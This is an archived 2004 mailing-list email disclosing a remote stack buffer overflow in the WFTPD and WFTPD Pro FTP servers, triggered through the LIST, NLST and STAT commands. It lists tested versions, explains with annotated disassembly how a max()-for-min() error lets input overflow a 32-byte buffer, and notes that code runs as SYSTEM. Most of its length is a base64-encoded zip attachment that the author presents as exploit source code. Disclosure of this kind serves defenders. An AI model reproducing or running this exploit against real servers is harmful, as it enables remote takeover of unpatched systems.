Date: Sat, 28 Feb 2004 21:52:33 +0000
From: axl rose <[email protected]>
To: [email protected], [email protected]Subject: Critical WFTPD buffer overflow vulnerability
Cc: [email protected]
------=_NextPart_000_176_2fe5_3bcb
Content-Type: text/plain; format=flowed
Name of Advisory: Critical WFTPD buffer overflow vulnerability
Severity: Critical
Discoverer: axl ([email protected])
Released: Today
Vendor Notified: Today
WFTPD who? what? when?
~~~~~~~~~~~~~~~~~~~~~~
Vendor quote: "WFTPD Server has been a leading FTP server for Windows since
it was released in 1993. Its stability and security have long been relied
on by technology companies, educational institutions, government
departments, individuals and others, to provide a secure FTP site."
Tested versions
~~~~~~~~~~~~~~~
- WFTPD Pro Server 3.21 Release 1 (trial) (latest version)
- WFTPD Pro Server 3.20 Release 2 (trial)
- WFTPD Server 3.21 Release 1 (trial) (latest version)
- WFTPD Server 3.10 Release 1 (trial)
All tested versions are vulnerable. Other versions may also be vulnerable.
Overview
~~~~~~~~
There's a stack based buffer overflow vulnerability that a remote attacker
can exploit to execute arbitrary code on the remote system running the
vulnerable WFTPD server software. For WFTPD Pro Server, the code will
execute as SYSTEM, and for WFTPD Server, the code will execute as the user
who started the server.
Vulnerability details
~~~~~~~~~~~~~~~~~~~~~
The vulnerable FTP commands are LIST, NLST, and STAT. The user must be
logged in as any user unless the Secure option in the registry is 0.
There's special code to check if the first argument's first character is
equal to '-'. If it is, and there's a ' ' character at some later position,
we'll execute this vulnerable code (WFTPD Pro trial v3.21.1.1). For the
programming challenged people, I've added comments:
004034B8 MOV EAX,[EBP+8] ; strchr(userbuf, ' ')
004034BB SUB EAX,ESI
004034BD DEC EAX ; num bytes to copy
004034BE CMP EAX,EDI ; (below) jump if num bytes to copy
004034C0 JLE SHORT 004034C4 ; is <= max_len - 2
004034C2 MOV EDI,EAX
004034C4 PUSH EDI ; max(max_len - 2, num bytes to copy)
004034C5 INC ESI ; don't copy '-'
004034C6 PUSH ESI ; &userbuf[1]
004034C7 PUSH EBX ; &dest[1] on the stack
004034C8 CALL memcpy
Anything between the first '-' char to the first ' ' char can be copied to
the string. This string only has room for 31 characters and a terminating
null byte. Obviously, the programmer mistakenly used max() instead of min().
Exploit
~~~~~~~
See attached source code.
_________________________________________________________________
Store more e-mails with MSN Hotmail Extra Storage √ 4 plans to choose from!
http://click.atdmt.com/AVE/go/onm00200362ave/direct/01/
------=_NextPart_000_176_2fe5_3bcb
Content-Type: application/x-zip-compressed; name="xp_wftpd.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="xp_wftpd.zip"
UEsDBBQAAgAIAAAAIQD9mKT2uREAAME/AAAMAAAAeHBfd2Z0cGQuY3Bw7Ttp
c9vGkp/pKv+HEVOWCYuiAJ6SddSKhxLtKpZKYjZ+K3FZMDgU8QQCfACoY1/y
37d7egYYgKAkO07tUbGLIjDT93T39Bzc+fD2DfvAfj0ZXvTZl+V0ykMW3PNw
6gUPjD8uvMCNq6ziGMx+9FjdNJtVFk4e4eVfZkE8t12v5gRzQaPvRg6i8gn7
8sTiGWfw8sQie87Z7fKJfVwgmAAd8igGMOIKUJEb+NHHpHtb9lyEAbviIQCw
Rq1usUvucTvizGKVOHRtz2AVz46BlqJhPINuJuh1hZ6B/gOMElTLXEXNKy2N
yh7ceIZWAtiQz4OYs2DBQzt2/VsWPQHoPGsR158EDxH7fIF6VdnVhZX0Xs2C
pQdWlxYH/mD/gEXLxSIIYxYAlzAhcH7Foxr7W7Bkc/uJBb73xGb2PReEAGm5
mICmIFI8tieTsIbtO2/fvH3zg+s73nLC2cGD60eBc1evzY6geRHat3ObgRfM
uR9XPPdLlZUfovq4Ua/BS9nIoaIQhJm0RvHEDUQbtE741PU5+/n489nppwEz
Hy3TNLFnZ0f1nZ/1e+f9QWlnhw1BXz+IheS+lAGs6ka1Wo2kngKSwnj7JorB
wg5zZnb4IVGSHbLyzeNx7+ZxDz4D+HQ65X0kf8dDn3ugycTzWKtm1ept06xZ
ltmGoACL0mjgYFTZ4JPBDo/YIlgA4Vu2oz0BIxCFexGYeQfGi3MRH0pe11de
UTHYNAhFZwjDCFHBTkHYIOJCKYbS8igSQ/KMKq3uzWPPBFW6f5Yq/sSdon0d
EDEG00furQ/O7YI20cxzxsF0Go2579zxJxDJfDTFv3pr/2UU0AucVkPqvgIJ
BEpRrO4uoCTAaCGCdoIJvx6xw7dvymQcqw0G2gWDwXejCe/1176XBQ3VhgZv
NW4edxuSbh8GAJ8B9qQFn5P004D23t7NY9ciGm2gsWsBXfwG3HoHaLWynwHw
OAEZTnoE0wQa5jHQkjTEe13rG2CffAa8XeDX7BJO8jyQvLtSF+DTAKcxtQ/S
6wC+2UufLXg+7tN7G/Qz4bPbJxqofxvkN62UhpAfYLqdLG3ERVs06qpN2mMX
nRY+sq8FNms1yXZ9gNtDffrEC22W4SXHBfnt9XO6WBTbe2YOpyn1sFQ70cA+
xTPhd5LnR7ywT+fVaBANHOeWlX7axzQe4lu91zXdOimv3WMpRwG/9l6e3yov
4kc0LKmDGPe67O+kfLt7ZAedZh1gBwC3uyvHpUd+gDjCH0H2HsjTBLx6k3jg
c1PgwHeP2hu9lEbS1ic/7Mj35m7uvZd9byHtPelj/SzPluxfsbP2rmx63Cyw
qZmF2WsV+69lZf1U9O2t+gjOI0X4Zl23L9FQuG0Va1Jf/CC99gnlG7NBzw0Z
h+2+JgfmmRPi3ZPy4Bg0MBcAnIXxhLy7Mt7Rd/qruqh4xzEXYyzzUQtg6ybx
6Z9QmyXloDY5Ll2KRzEuPbJDQ8reARv0e5SPdps0OWEb5jTiQTQQV/ExT2TO
6JHfKlmQti6LmcgiY+5E5rheKkvbonyMbWhHfG9LP8NYatfJRm2ZT/G5s0d2
FGPYofyO7y2Zd5CGgGuSLh013h2iocMLnviNY9AinCLaTQU7kDE3IPi2ynUm
wQhZW1KGJj2jH4t2xasldWnQR/ETfX3Svy7po4/ht6Cv3jH+ZLys0k7pgg/t
Yymg1SMwP8Na4lrWcKP9pFObwHHmxil7Py0jRDU9vrg8h9rRGg8vT4/PBASW
L69cERSRMhNS1lpShasDnZQuUX2/lNL5CnEaVipKo5BG8QICq51pvECQwyIj
CRMikBuFk8rVee/fBkMWAeI/374pTSfjiMcsBKDSSX/8H4PL88pmaMjXq8Gw
ElWZbIjdOb+3PYbl1z/NKjN/x1akDGUftEUgmxNXLESosk+/nJ2pv5uxIOBO
WQVBD5gJ7EsleF6GvhjkEpW/SRuCbdD4/67kv4Uq1oMKP9GhKsvbCEzh31ZT
//G4L/UjAN9DFg8z1+OsUvE9ELYieow5nzuzsCI8ssre3/jvq9L7DChyD4X8
KCvSEvJL1zwCdd3/4sGUUA2hjwAqLUCYeFopX2+P2DAImBfAmg3lvvHLwgxZ
xUu/C9KgH0gNgoXcuRdGpyghfqNqlh0s+agDRoFoomxI4OBQGndVmEEYwuoB
6HP3HteRsJSz18tEUglltw5RNuyg9sTOvudOHtGYqsWo/HJ2/unH8cXw0kA7
b1OsJ6NPCEeHcoRIyLzBorkNixAH/oBL065DIqYuJRoOx2/xVFEeIMdRsBEI
1HEtGkYyoeiSMJNtbjIdatsa4cC/vwnfCzuu9MmkpFHZgnAEnaTfaIY7zPi2
UFYKLAWVgyzIbFkj5Xtgt5S0IQdY9hyypCcdEWkWSw8XGJAg5Kshn0uuKiys
jJtviGQRkV/r5EsyislJpRoZ30SXTEI8P2CZYA75wnsSy668jGKawJjRZwlp
840kD4AA+J3wxxfDKPSrntgDwb0AwGY43ywjhpzznrWtWVVI4YClhCQNlKEk
HxNXAlWQjHKrjYojvAf+//Ybo+ft9wa+gCOB15OQmNsa2AjwgA3U7Dhwn1Pg
V+6GEyYs9qLIsNwVYjaFxNLjZKMyWUOQUJBCIRBaqZEIrkTRnUSmlteOhYJ/
Zjx8/hjnUmRWOZkliScqNF9UiF2iluQr3xXr0peQ23dJns1Eixy3xCUjwP2i
Ty5icqYZRLi5TNL0MPXsW+Wu0jp6UhOwYlL0J2gcQUAgE2KatNOUrQmLqRxC
XcxbJcAVOXgl3sWMkZslkWH0kha68JIWaa8khViODemxFNSJ2GmCicZQDriT
MRKvULBkaTpiDscMK55wek1fhLclxOzJZPzlKeZR5T5wJx/YJIqFqJv4RDMd
gsGLMCJpRaBR6FAnPKQzP9pWokKupC7I90QAQ2+l80A1FQZgN7f9vW+sm5TS
mJNFBpDdSrQQ0kpJESER41C27q/J586MO3dj179XhtJH1rfnPGuVZKzhQauH
dG8QZVDaYAAkpVncZayIIRZ5Dr4OJBl43trKzxS6G3y5dkfrqqF30fW75YhV
3pn1zwZM8D7GPwgQ267PhE7MNGcwfxzDHxChbs7AxlWpnAuuicTXlFDrJ0Lu
O8JiYjTA+6hs3GR3qgYu0FZsLL+orMP+k7kiuec6XJl+UDnXX3IyawngoUwQ
It8x9aRPrqREcaKcuv4EdQmfFrEb+Aw3T1F0VI2hSYWtHEPzn5XyGU0BeJVc
OsDcSU9ppEUxX/xhA62xQ0Lw70AQWe7D04EQA58wFIh7Zq7JORrUTX8fiQEo
TPUCR1EtlEIayX2V4W0/Z3sV/fo8lbqc3LBP03C6NsHlQOQutKZohgcxER7H
SIsngmyN8BADq/X88dsWW0bYfjX4ic1smPWSKjmzKJNFnlwozbjnyYIDVzYo
/3gch09qCHUAnz+IQLmWM2uyR25AGbyv1bIJUjXdR0/mYx1LCpdyua6P1FLM
OD4ZQ5033M8CNFKAioRgR0ds18jBNTU4YchCqFYKJYBy3W2diLtAEvVmnkZn
Fchq54F2V4FWhNnThHEX+5m40AJtNwkyPRaSnKbZcsvFZaL2vrulcnEJhtnj
9j3XV3dF3Jor3KAfc5WePTZTJqtnM6PqytnL9iqUSOfStkKju3TJkJG1tIYX
yAHagWBaxOtRc5V4ci5lHopcqX9E3nyGTWNUfUmS+uhZCtaz3XJKKxqOV1gy
HbDSc8OCxoLJZ70UkFBc9o415UpLply1hlQrwXRoxHwmzs6gboRcTEexo31V
/FIz7Q/QLC0nHXuCm0jiJNKUm8nikGNQJiitQpnGi7Ezx7O78tnp1ZBtl5Oy
eSMtGIlTNeWYJh/RgsUrEcrWtbIRlgpsB48u/5HTEAz64MbOjFVoe01FRf7U
GGTGLbncLt5HJDoJeOS/B2MARTboXjBwQjy+hSFx7vKYasPuqzEzG5kf0yTx
VSYqbxOxweeLs/PT4bj7tzEsvceVnjHGix3bECMNS9Q6IF3D2hZlB22OUNR+
JTs6atuT59D13TLmA0k+gJl3Gn28NkffQlqddmsE+aPDKQXIqfJb6JLnalRh
4vT4Pfe+CzHUGcb5u9DCqR8t8F2I2eGt9b0I1b8Xocb3ItT8XoRaf4yQUSIy
7YIpUBW2hWFvaWEPacleevH/kRSwYkUnCO5c/lc2+Sub/JVN/vxs8oM6cvtf
V72szXFIerGEGjZitswWzJ7GuCzOxHiaB3f0G6z582GUTqMUBSCjHaeCMs9+
Cpa40Ym6iGa8rmpH+Czo0uVJdUe1xn4KHiCEIVeo+5ssdG9nsZYx5B09gOC4
A8bm9h1neOEzCO/EdUrW6Qy6PbPVxbWNfivv8IhdnF+wy8GPbEd7uhwMa2yI
1/9cIVdRdsLLm9ADRtKkBRmBKn/kzjLmtTUmEjAuVOTcnijYRHtsD5dOLKlJ
jWkjz/XJmGQxUrrGTn26qYgjDEvA+H0qAd12XaErbrmC14I96B9qPuh+ls09
c9AFizF29dMl655VO51vgWfJP+i1Bvjwrz9fAMz55ZAFyxAXTPKq6/+j2pqd
XyrXrywgyIw/a3pERhrb78pMzZrIY5Xxt7NSV0AHuDLFVapuw28nm8n1fxH4
HydgPDtB0j1mbT/569joG6MFu6EqIJchowTz9U7KbkKxe9WgGT/k/2BbeCTK
gqk4Ty3YsxFqrJwllRNZy6+Rm2RdpaICtKzHqqShGl4gQcqVld5bLc0C243t
VuFGlOvT/XZ7n9m1SN11n8WB7+H+K22wZbYHcWxxIz7ZJnyYuc6M5jsn8H3u
iJ8NvIs+vlvWajVhZTBoPPbjwK7YOLpivz7dkEoOUAsGzlx3JHZiux6fiN9j
4LAl4qQH4bmN23W7nBH+VCBaOg7Ms9Oll9wSkAcd4nqbvDMzHk9d3wYQtes/
4R7HCUcRSw9E1I2tQ3VEnTkhsbEsUr9YET/pWXo+D+0vrufGmgDpnS79jMQL
bl1/zUH1MoLKRzvSTFsXdhQVHJKcBbe3OJ6uT4NlFF7O0LYzxaEdnZUD7/Iv
V4NLVhZXVzIdqSCmcloNS0YfIambHLmbLXiRTG5tr5wpp6MPxsCS6QfrmUNl
cTFD8DhkjUbuvk4q1MXx1dU6VdB6mip/QJdnfVlpU3/myltOp41DVm+8zko1
1kOMd40lnXhiWlpjsryLiLuluZO75OAOz83xLO5hDIGwkGekCxz9nMO9i9iB
uzhiB5gB4CsSLxG9XW8vE68ZwdsiMTy+3QMS1A6/wR/zN3yAFdfRSOhBnMSt
nEc3rliZuxZzG2JF3JMIb+UB9ocP+HKfk43K+INDdo/1e2h9+8/20vj99eq4
fzw8Zg+RrUIJmq7wWGG5qJiPZt2sV9kmdBtG7kRbgqPU4DktulGXmBjlh4pQ
sskekboLPIOMg5lXEXkXczohWCO6Epc7PxWnftpdRGo2xMUqgVcfZdHUSew6
Po1iPtGLjJrEqCih4VGG7Qf+0zxYRuUiKPQUAfXolQtuY7ToYAgNWnD6DmsG
vBolpMDTwPL2smzglRtXXFIkPC18NbEEztaWO0pnGtwgYGvoLl6kKxX5Srr3
z9JVSG6KJQ7XyhhUZVXNvXAbupSToIiY+Twx8/XEnhHsq4SCRLGWjrUiD8EV
RhqacWsrOxry+LAIOs3TGxAqOKMI/xdTi2xQNxfWhzb+IhQDCyo9FuGDvJgY
8biyGVGZaKbVpigT6f6u+JlpBPXd1J67Hh7fahcF0l4Zk1jxRZWkMEv76SFb
GFJdCGCqBoGe00//fnx22h9T08r9iOfqzKIys0eVJFYmzxeTaS2JUqC5wDJS
0ypDacZXw8vB8c9VdnoBPjg8Hw97F2n1GeG8LK6cEkec0ivK6h8MZeOsgZ+Z
y9PbL5LgKwtSqTCfaOWnKsOK6olEgaQIqK8T6ccgpvuvBTP/qlDCYanEzJRx
SQ1prFsbqbs7WMnjNR3ybmNFnrOlc/cES0k8Xp9EWtmZRlSmVLf92H4fsQc7
dmboEE/BckOhFJblNK4beaeUd5m8IOLSTyJj5WaovPn131BLAQIUABQAAgAI
AAAAIQD9mKT2uREAAME/AAAMAAAAAAAAAAEAIACAgQAAAAB4cF93ZnRwZC5j
cHBQSwUGAAAAAAEAAQA6AAAA4xEAAAAA
------=_NextPart_000_176_2fe5_3bcb--
